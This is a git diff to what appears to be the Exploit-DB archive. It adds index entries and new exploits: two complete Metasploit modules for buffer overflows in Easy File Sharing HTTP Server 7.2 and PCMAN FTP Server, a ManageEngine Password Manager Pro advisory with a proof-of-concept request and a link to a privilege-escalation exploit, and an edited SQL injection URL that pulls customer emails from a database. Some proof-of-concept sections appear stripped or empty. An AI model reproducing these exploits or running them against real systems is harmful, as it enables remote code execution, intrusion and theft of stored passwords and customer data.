diff --git a/files.csv b/files.csv index 859939f20..e9012b7f4 100755 --- a/files.csv +++ b/files.csv @@ -15218,6 +15218,8 @@ id,file,description,date,author,platform,type,port 17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow",2011-07-07,metasploit,windows,local,0 17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk <= 8.0.0.12 Database Disclosure Exploit",2011-07-07,@ygoltsev,jsp,webapps,0 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal Vulnerability",2011-07-08,"SecPod Research",hardware,remote,0 +39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 SEH Overflow",2016-04-05,metasploit,windows,remote,80 +39662,platforms/windows/remote/39662.rb,"PCMAN FTP Server Buffer Overflow - PUT Command",2016-04-05,metasploit,windows,remote,21 17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - XSS Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0 17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) - Remote Code Execution Exploit",2011-07-08,wofeiwo,php,webapps,0 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - (.ZIP) Buffer Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,local,0 @@ -35883,3 +35885,6 @@ id,file,description,date,author,platform,type,port 39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0 39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0 39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 and 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0 +39663,platforms/windows/dos/39663.html,"Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0 +39664,platforms/jsp/webapps/39664.txt,"ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities",2016-04-05,S3ba,jsp,webapps,7272 +39666,platforms/windows/local/39666.txt,"Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0 diff --git a/platforms/jsp/webapps/39664.txt b/platforms/jsp/webapps/39664.txt new file mode 100755 index 000000000..f1f6e6c49 --- /dev/null +++ b/platforms/jsp/webapps/39664.txt @@ -0,0 +1,388 @@ +[Systems Affected] + Product : ManageEngine Password Manager Pro + Company : ZOHO Corp. + Build Number : 8.1 to 8.3 and probably earlier versions + Affected Versions : 8102 to 8302 and probably earlier versions + + +[Product Description] + Password Manager Pro is a secure vault for storing and managing +shared sensitive information such as passwords, documents and digital +identities of enterprises. + + +[Vulnerabilities] + Multiple vulnerabilities were identified within this application: + 1- Stored XSS in /AddMail.ve + 2- Privilege escalation in /EditUser.do + 3- Business Login Bypass in /EditUser.do + 4- Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp + 5- Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp + 6- Resource's user enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp + 7- Password Bruteforce for resources accounts in +/jsp/xmlhttp/AjaxResponse.jsp + 8- Cross-Site Request Forgery + + +[Advisory Timeline] + 17/07/2015 - Discovery and vendor notification + 17/07/2015 - ManageEngine responsed that they will notify their +development team + 13/10/2015 - ManageEngine informed that they have fixed these issue + 14/10/2015 - Fixed Password Manager Pro build version 8300 has been released + 15/10/2015 - Test on Beta build version 8300 was performed and +confirm the fix of these issues 2, 4, 7 and part of issue 8 + 02/11/2015 - ManageEngine ask more time to fix the remaining issues +before making this public + 29/12/2015 - ManageEngine contacted for an update - No reply + 12/01/2016 - ManageEngine contacted for an update - No reply + 08/02/2016 - ManageEngine contacted for an update - small update provided + 12/02/2016 - Last communication from ManageEngine + 04/04/2016 - Public Disclosure + + +[Patch Available] + Password Manager Pro Release 8.3 (8300) (Released on October, 2015) +fix issues #2, #4, #7 and partially #8 + Password Manager Pro Release 8.3 (8303) (Released on December 2015) +fix issues #1, #3, #5 and #6 + + +[Exploit] + There is an exploit available that takes advantage of the Privilege +Escalation vulnerability (Issue #2) and elevates a regular user to +SuperAdmin, and then downloads the passwords and files stored within +the application. The exploit code is available here + - https://github.com/s3bap3/pmp-exploit + + +[Description of Vulnerabilities] + +(1) Stored XSS in /AddMail.ve. + This functionality is under the personal accounts stored in the +application. However, as the page is also vulnerable to CSRF, an html +form can be forged to create a personal account an exploit the XSS +vulnerability. The affected parameter is "password", and the POST +message to send is something like this + + [PoC] + POST /AddMail.ve?SUBREQUEST=XMLHTTP HTTP/1.1 + + service=1&serviceurl=1&loginname=1&password=" /> + + + + + + + + + Privilege Escalation + + +
+ + + + +
+ + + +-- +S3ba +@s3bap3 +http://linkedin.com/in/s3bap3 \ No newline at end of file diff --git a/platforms/php/webapps/17327.txt b/platforms/php/webapps/17327.txt index 39eadde6b..1af21307f 100755 --- a/platforms/php/webapps/17327.txt +++ b/platforms/php/webapps/17327.txt @@ -13,15 +13,15 @@ ------------------------------------------------------------------------ vulnerable url: -/templates1/view_product.php?product=3D +/templates1/view_product.php?product= Example: -http://localhost/templates1/view_product.php?product=3D[SQL INJECTION] +http://localhost/templates1/view_product.php?product=[SQL INJECTION] Get an Mail from the Customers Table: -http://localhost/templates1/view_product.php?product=3D94746%20AND%20%28SEL= +http://localhost/templates1/view_product.php?product=94746%20AND%20%28SEL= ECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%= 2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2= CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%2= diff --git a/platforms/windows/dos/39663.html b/platforms/windows/dos/39663.html new file mode 100755 index 000000000..0ce7ec65b --- /dev/null +++ b/platforms/windows/dos/39663.html @@ -0,0 +1,42 @@ + + + + + + + + diff --git a/platforms/windows/local/39666.txt b/platforms/windows/local/39666.txt new file mode 100755 index 000000000..c2562ea56 --- /dev/null +++ b/platforms/windows/local/39666.txt @@ -0,0 +1,11 @@ +Sources: +https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf +https://github.com/sam-b/CVE-2014-4113 + +EDB Mirror: https://www.exploit-db.com/docs/39665.pdf + + +Trigger and exploit code for CVE-2014-4113: + +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39666.zip + diff --git a/platforms/windows/remote/39661.rb b/platforms/windows/remote/39661.rb new file mode 100755 index 000000000..8064ae062 --- /dev/null +++ b/platforms/windows/remote/39661.rb @@ -0,0 +1,70 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow', + 'Description' => %q{ + This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software. + }, + 'Author' => 'Starwarsfan2099 ', + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'EDB', '39008' ], + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 390, + 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x10019798 } ], + ], + 'DefaultOptions' => { + 'RPORT' => 80 + }, + 'DisclosureDate' => 'Dec 2 2015', + 'DefaultTarget' => 0)) + end + + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def exploit + connect + print_status("Sending exploit...") + sploit = "GET " + sploit << rand_text_alpha_upper(4061) + sploit << generate_seh_record(target.ret) + sploit << make_nops(19) + sploit << payload.encoded + sploit << make_nops(7) + sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20) + sploit << " HTTP/1.0\r\n\r\n" + sock.put(sploit) + print_good("Exploit Sent") + handler + disconnect + end +end \ No newline at end of file diff --git a/platforms/windows/remote/39662.rb b/platforms/windows/remote/39662.rb new file mode 100755 index 000000000..1e89280c5 --- /dev/null +++ b/platforms/windows/remote/39662.rb @@ -0,0 +1,80 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Ftp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PCMAN FTP Server Buffer Overflow - PUT Command', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability found in the PUT command of the + PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous + credientials are enabled. + }, + 'Author' => + [ + 'Jay Turla', # Initial Discovery -- @shipcod3 + 'Chris Higgins' # msf Module -- @ch1gg1ns + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'EDB', '37731'], + [ 'OSVDB', '94624'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process' + }, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00\x0A\x0D", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP3 English', + { + 'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll + 'Offset' => 2007 + } + ], + ], + 'DisclosureDate' => 'Aug 07 2015', + 'DefaultTarget' => 0)) + end + + def check + connect_login + disconnect + + if /220 PCMan's FTP Server 2\.0/ === banner + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + + def exploit + connect_login + + print_status('Generating payload...') + sploit = rand_text_alpha(target['Offset']) + sploit << [target.ret].pack('V') + sploit << make_nops(16) + sploit << payload.encoded + + send_cmd( ["PUT", sploit], false ) + disconnect + end + +end \ No newline at end of file